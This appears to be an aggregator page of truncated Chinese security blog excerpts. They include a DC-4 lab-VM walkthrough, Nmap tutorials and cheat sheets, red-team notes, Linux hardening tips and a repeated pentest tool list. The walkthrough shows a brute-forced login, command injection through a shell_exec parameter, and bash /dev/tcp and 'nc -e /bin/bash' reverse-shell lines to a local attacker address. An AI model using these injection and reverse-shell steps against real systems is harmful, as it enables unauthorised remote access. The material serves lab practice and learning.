nmap

DC-4靶机

≡放荡痞女 提交于 2020-08-19 05:41:51
下载 ,安装(vmware直接导入文件),桥接 kali开始nmap扫描 nmap -sP 192.168.123.0/24 找到目标ip:192.168.123.9 浏览器访问,就一个登陆页面 nmap扫描端口;只有22和80 可以确定是linux了(废话) 再dirsearch扫描目录 也没有有用的信息 先试试注入,手注和sqlmap都没找出什么来 burp抓包跑字典暴力破解再试试看 暴力破解出了结果 admin happy 登陆后的页面, 只有一个command,点进去,有3个命令供执行 ls -l 显示目录内容列表 du -h 显示每个文件和目录的磁盘使用情况 df -h 显示磁盘相关信息 试试抓包,执行命令作为明文参数,修改成别的,发现也可以执行(这里我是换成了dir) 验证其可行性后,试试看别的命令,cat command.php 可以看到执行命令的是这个shell_exec()函数 用户是www-data,权限组在33 没有写文件的权限 直接 反弹shell 看上去像是把命令里的&符当成分隔符了。编码一下就解决了 bash+-i+>%26%2Fdev%2Ftcp%2F192.168.123.42%2F1234+0>%261 然鹅还是反弹不出来,看不到报错,也不知道是什么的原因 换nc反弹 nc 192.168.123.41 1234 -e /bin/bash 反弹成功

如何使用Nmap进行端口扫描(八)输出格式与详细程度选项

我与影子孤独终老i 提交于 2020-08-18 11:55:55
3.4 输出格式与详细程度选项 Nmap提供了以标准格式,“grepable”格式或XML编写报告的功能。这些报告使用-oN(常规),-oG(可复制)和-oX(XML)选项启用。每个选项都需要一个文件名做参数,并且可以将它们组合在一起,方便一次以多种格式输出。还可以使用几个选项来增加输出的详细程度。本节列出了最重要的与输出相关的选项,以及它们如何应用于端口扫描。 适用于端口扫描的热门Nmap输出选项: 1)-v 增加详细程度,使Nmap打印有关正在进行的扫描的更多信息。 2)-d 提高调试级别,使Nmap打印出有关其操作的详细信息,这对于跟踪错误或仅了解其工作方式很有用。 3)- -packet-trace 使Nmap打印发送或接收的每个数据包的摘要。 这通常用于调试,但是对于新用户来说,也是一种非常有价值的方式,可以准确地了解Nmap的内幕。 4)-oN <filename> (正常输出) 将输出以Nmap的正常格式写入<filename>。 此格式与Nmap在运行时打印的标准交互式输出大致相同。 5)-oX <filename> (XML输出) 将Nmap的XML格式的输出写入<filename>。 这是供处理Nmap结果的脚本和程序使用的首选格式。 6)-oG <filename> (grepable格式输出) 将输出以Nmap的所谓grepable格式写入<filename

《渗透攻击红队百科全书》--笔记

百般思念 提交于 2020-08-17 15:55:34
目录 1.前言 1.1红队(RedTeam) 鱼叉攻击 水坑攻击 1.2网络攻击杀伤链(Cyber kill Chain) 1.3 MITRE ATT&CK 2. 信息收集 2.1主机发现 2.1.1nmap 2.1.2 masscan 2.1.2.1 masscan VS nmap 2.1.3 nbtscan 2.1.4 hping3 2.1.4.1 DRDDOS 2.2关联信息生成 2.2.1 字典生成 2.2.1.1 pydictor 2.3 开放漏洞情报 2.3.1 常用网站 2.3.1.1 Search Exploit-DB 2.4 开源情报信息收集(OSINT) 2.4.1 搜索引擎 2.4.2 在线接口 2.4.3 DNS历史解析记录 2.5 Github Hacking 2.5.1 自动化工具 2.5.1.1 GitMiner 2.6 Google Hacking 2.7 Git-all-secret 1.前言 1.1红队(RedTeam) 自动化的发起大规模、海量节点的实战攻击,以便测试用户在各个业务场景的应急响应能力。 鱼叉攻击 水坑攻击 1.2网络攻击杀伤链(Cyber kill Chain) 杀伤链共有 发现 - 定位 - 跟踪 - 瞄准 - 打击 - 达成目标 六个环节,在越早的杀伤链环节阻止攻击,防护效果就越好。例如,攻击者取得的信息越少

linux系统安全-弱口令检测和端口扫描

前提是你 提交于 2020-08-17 10:45:59
一、linux系统安全概要 二、详细说明 1)用户方面清除一些不必要的系统用户,可以减少 ** 我们linux的入口;锁定账号适用于员工在一段时间不适用账号的场景(usermod -L);而锁定/etc下的passwd和shadow文件可以避免非法用户建立用户(chattr +i) 2)密码方面,设置密码有效期可以做到提醒用户定期更改密码,避免长期使用同一密码导致密码被破解的情况(vim /etc/login.defs和chage -M);设置员工首次登陆更改密码其实是为了员工在登陆账号后更改属于自己的密码(chage -d 0) 3)众所周知,默认的命令历史会显示之前敲过的1000条命令,假如linux被非法用户使用,通过history查看命令历史是一件很危险的事。所以,我们可以将命令历史的行数改的比较短,或者注销后直接清空来保证安全(export HISTSIZE=和vim ~/.bash_logout)。 4)自动注销(export TMOUT),即用户长时间不登陆自动返回登陆界面 5)工作中有时需要允许普通用户登陆操作系统,但是普通用户如果可以使用su切换用户则存在比较大的危险性,通过启用pam_wheel认证可以很好的避免此类情况的产生(vim /etc/pam.d/su);而通过修改/etc/sudoers文件可以为用户分配一些必要的权限(visudo或vim /etc

Linux

痴心易碎 提交于 2020-08-17 03:44:51
  命令   可使用命令包括但不限以下:curl, ssh, nmap, telnet,nc   测试代码以 opcai.top 443 端口为例。      目的   找到一种更通用的能在几乎所有环境下完成检查的方法   找到一种更稳定的几乎不会判断出错的方法   示例 nmap   缺点:   一般需要额外安装   某些检测方法需要 sudo 权限   优点:   判断更为准确   输出文本 nmap -p443 opcai.top Starting Nmap 6.40 ( http://nmap.org ) at 2020-03-09 09:58 CST Nmap scan report for opcai.top (180.97.125.228) Host is up (0.026s latency). PORT STATE SERVICE 443/tcp open https    Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds 判断命令 nmap -p443 opcai.top | grep "^443/tcp.*open"   注:如果有可能,使用 sudo 权限执行可以使 namp 在更多情况下准确地判断端口状态。      telnet   缺点:   可能需要额外安装  

[网络安全学习篇52]:扫描技术

旧时模样 提交于 2020-08-17 02:31:07
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!! 往期博客: 第一阶段: [网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记) [网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118) 第二阶段: [网络安全学习篇25]:初识Linux及简单命令 [网络安全学习篇32]:Linux脚本编写汇总及应用 第三阶段: [网络安全学习篇33]:0基础带你入门python [网络安全学习篇38]:基础环境搭建 [网络安全学习篇39]:HTML标签基础 常用的标签 表格 [网络安全学习篇42]

github渗透测试工具库[转载]

给你一囗甜甜゛ 提交于 2020-08-16 10:01:41
前言 今天看到一个博客里有这个置顶的工具清单,但是发现这些都是很早以前就有文章发出来的,我爬下来后一直放在txt里吃土。这里一起放出来。 漏洞练习平台 WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞练习平台: https://github.com/Medicean/VulApps dvwa漏洞练习平台: https://github.com/RandomStorm/DVWA 数据库注入练习平台 : https://github.com/Audi-1/sqli-labs 用node编写的漏洞练习平台,like OWASP Node Goat: https://github.com/cr0hn/vulnerable-node Ruby编写的一款工具,生成含漏洞的虚拟机: https://github.com/cliffe/secgen 花式扫描器 Nmap端口扫描器: https://github.com/nmap/nmap 本地网络扫描器: https://github.com

github渗透测试工具库[转载]

微笑、不失礼 提交于 2020-08-16 10:01:24
前言 今天看到一个博客里有这个置顶的工具清单,但是发现这些都是很早以前就有文章发出来的,我爬下来后一直放在txt里吃土。这里一起放出来。 漏洞练习平台 WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞练习平台: https://github.com/Medicean/VulApps dvwa漏洞练习平台: https://github.com/RandomStorm/DVWA 数据库注入练习平台 : https://github.com/Audi-1/sqli-labs 用node编写的漏洞练习平台,like OWASP Node Goat: https://github.com/cr0hn/vulnerable-node Ruby编写的一款工具,生成含漏洞的虚拟机: https://github.com/cliffe/secgen 花式扫描器 Nmap端口扫描器: https://github.com/nmap/nmap 本地网络扫描器: https://github.com

github渗透测试工具库[转载]

落爺英雄遲暮 提交于 2020-08-16 08:35:11
前言 今天看到一个博客里有这个置顶的工具清单,但是发现这些都是很早以前就有文章发出来的,我爬下来后一直放在txt里吃土。这里一起放出来。 漏洞练习平台 WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞练习平台: https://github.com/Medicean/VulApps dvwa漏洞练习平台: https://github.com/RandomStorm/DVWA 数据库注入练习平台 : https://github.com/Audi-1/sqli-labs 用node编写的漏洞练习平台,like OWASP Node Goat: https://github.com/cr0hn/vulnerable-node Ruby编写的一款工具,生成含漏洞的虚拟机: https://github.com/cliffe/secgen 花式扫描器 Nmap端口扫描器: https://github.com/nmap/nmap 本地网络扫描器: https://github.com

NMAP常见命令总结

怎甘沉沦 提交于 2020-08-15 14:35:51
文章目录 主机发现 端口扫描 指纹识别与探测 操作系统探测 防火墙/IDS(入侵检测)逃逸 保存和输出 主机发现 nmap -A baidu.com:全面扫描 nmap 127.0.0.1-200:扫描一个C段 nmap baidu.com :进行一个快速的扫描 Ping扫描: 只进行ping,然后显示出在线的主机 主机发现: nmap -sP 192.168.126.131/24 无Ping扫描: 常用于防火墙禁止ping的情况下 nmap -P0 192.168.121.32 可以手动设置扫描的协议 如: TCP:对应协议编号为6。 ICMP:对应协议编号为1 IGMP:对应协议编号为2 UDP:对应协议编号为17 用TCP,UDP,IGMP协议向目标主机发包判断是否存活; nmap -p06,17,2 192.168.121.1/24 (默认用的为1,2,4) TCP SYN扫描 nmap -PS -v 192.168.21.1 通常情况下Nmap 默认ping扫描是使用TCP ACK和ICMP Echo请求对目标进行扫描.目标主机的防火墙阻止这些请求时,可以用TCP SYN Ping扫描进行对目标主机存活的判断 指定端口范围进行的扫描nmap -PS80,100-200 -v 192.168.21.1 TCP ACK Ping扫描 使用-PA选项可以进行TCP ACK